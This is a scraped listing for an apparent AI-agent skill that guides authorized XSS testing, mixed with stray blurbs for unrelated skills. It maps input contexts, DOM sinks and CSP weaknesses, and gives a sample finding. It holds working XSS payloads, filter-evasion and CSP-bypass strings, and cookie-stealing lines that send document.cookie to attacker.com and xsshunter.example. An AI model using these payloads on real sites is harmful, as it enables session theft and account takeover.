From cybersecurity-skills
Tests web apps for reflected, stored, and DOM-based XSS by injecting payloads, mapping inputs/outputs, and bypassing sanitization/CSP protections.
npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skillsThis skill uses the workspace's default tool permissions.
- Testing web applications for client-side injection vulnerabilities as part of OWASP WSTG testing
Applies Acme Corporation brand guidelines including colors, fonts, layouts, and messaging to generated PowerPoint, Excel, and PDF documents.
Builds DCF models with sensitivity analysis, Monte Carlo simulations, and scenario planning for investment valuation and risk assessment.
Calculates profitability (ROE, margins), liquidity (current ratio), leverage, efficiency, and valuation (P/E, EV/EBITDA) ratios from financial statements in CSV, JSON, text, or Excel for investment analysis.
Do not use against applications without written authorization, for deploying persistent XSS payloads that affect real users, or for exfiltrating actual user session tokens from production environments.
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
Map every location where user input enters and is rendered by the application:
location.hash, location.search, document.referrer, window.name, postMessage, or localStorage and writes to the DOM<div>USER_INPUT</div><input value="USER_INPUT">var x = 'USER_INPUT';<a href="USER_INPUT"><div style="color: USER_INPUT">Test reflected injection points with context-appropriate payloads:
<script>alert(document.domain)</script>, <img src=x onerror=alert(1)>, <svg onload=alert(1)>" onfocus=alert(1) autofocus=", " onmouseover=alert(1) ", "><script>alert(1)</script>';alert(1)//, \';alert(1)//, </script><script>alert(1)</script>javascript:alert(1), data:text/html,<script>alert(1)</script>--><script>alert(1)</script><!--<ScRiPt>alert(1)</sCrIpT><details open ontoggle=alert(1)><svg><animate onbegin=alert(1) attributeName=x><img src=x onerror=alert(1)>Test persistent storage points that render input to other users:
<script>alert('XSS-PROFILE-001')</script>"><script src=https://yourxsshunter.xss.ht></script>) for blind stored XSS where the payload fires in an admin panel or internal tool you cannot directly accessAnalyze client-side JavaScript for unsafe DOM manipulation:
document.location, document.URL, document.referrerlocation.hash, location.search, location.hrefwindow.name, postMessage event datainnerHTML, outerHTML, document.write(), document.writeln()eval(), setTimeout(), setInterval(), Function()element.setAttribute() with event handlers, jQuery.html(), .append(), v-html (Vue), dangerouslySetInnerHTML (React)dangerouslySetInnerHTML, Angular template injection ({{constructor.constructor('alert(1)')()}}), Vue v-html directiveTest Content Security Policy effectiveness and demonstrate real-world impact:
unsafe-inline in script-src allows inline scriptsunsafe-eval allows eval() and similar functions*.googleapis.com) may host JSONP endpoints usable for CSP bypassbase-uri not set allows <base> tag injection to redirect relative script loads<script src="https://allowed-domain.com/jsonp?callback=alert(1)"></script><script>new Image().src="https://attacker.com/steal?c="+document.cookie</script>| Term | Definition |
|---|---|
| Reflected XSS | Non-persistent XSS where the injected payload is included in the server's response to the same request, requiring the victim to click a crafted URL |
| Stored XSS | Persistent XSS where the payload is saved on the server and served to other users who view the affected page |
| DOM-Based XSS | XSS that occurs entirely in the browser when client-side JavaScript reads attacker-controlled data and writes it to a dangerous DOM sink |
| Content Security Policy | HTTP response header that restricts which sources the browser can load scripts, styles, and other resources from, providing defense-in-depth against XSS |
| Output Encoding | Converting special characters to their HTML entity equivalents (e.g., < to <) to prevent the browser from interpreting user input as code |
| Sink | A JavaScript function or DOM property that can cause code execution or HTML rendering if attacker-controlled data reaches it unsanitized |
Context: An e-commerce platform has a customer support system where customers submit tickets that are viewed by support agents in an internal admin panel. The ticket submission form accepts HTML formatting.
Approach:
Pitfalls:
<script>alert(1)</script> and missing XSS that fires through event handlers or in non-HTML contexts## Finding: Stored XSS in Support Ticket Description
**ID**: XSS-002
**Severity**: High (CVSS 8.1)
**Affected URL**: POST /api/tickets (submission), GET /admin/tickets/8847 (trigger)
**Parameter**: description (POST body)
**XSS Type**: Stored (persistent)
**Description**:
The support ticket description field does not sanitize HTML input before storing
it in the database. When a support agent views the ticket in the admin panel, the
unsanitized HTML is rendered in the agent's browser, allowing arbitrary JavaScript
execution in the context of the admin application.
**Proof of Concept**:
Submitted ticket with payload:
<img src=x onerror="fetch('https://xsshunter.example/callback?c='+document.cookie)">
The payload fired when the agent viewed the ticket, exfiltrating the admin session
cookie to the XSS Hunter server.
**Impact**:
An attacker can steal the session tokens of support agents and administrators,
gaining access to the admin panel with privileges to view customer PII, process
refunds, and modify orders. Affects all 23 support agents who view customer tickets.
**Remediation**:
1. Implement output encoding using a context-aware library (OWASP Java Encoder,
DOMPurify for client-side rendering)
2. Deploy Content Security Policy header:
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
3. Set HttpOnly flag on session cookies to prevent JavaScript access
4. Sanitize HTML input server-side using a whitelist approach (allow only safe tags)